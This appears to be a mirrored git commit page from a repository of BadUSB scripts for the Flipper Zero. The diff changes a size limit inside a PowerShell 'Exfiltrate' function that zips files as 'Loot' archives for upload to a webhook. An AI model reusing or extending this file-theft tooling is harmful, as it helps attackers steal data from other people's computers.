mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-08 03:10:53 -08:00
Update main.ps1
This commit is contained in:
@@ -7,7 +7,7 @@ if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookur
|
||||
Function Exfiltrate {
|
||||
|
||||
param ([string[]]$FileType,[string[]]$Path)
|
||||
$maxZipFileSize = 25MB
|
||||
$maxZipFileSize = 10MB
|
||||
$currentZipSize = 0
|
||||
$index = 1
|
||||
$zipFilePath ="$env:temp/Loot$index.zip"
|
||||
|
||||
Reference in New Issue
Block a user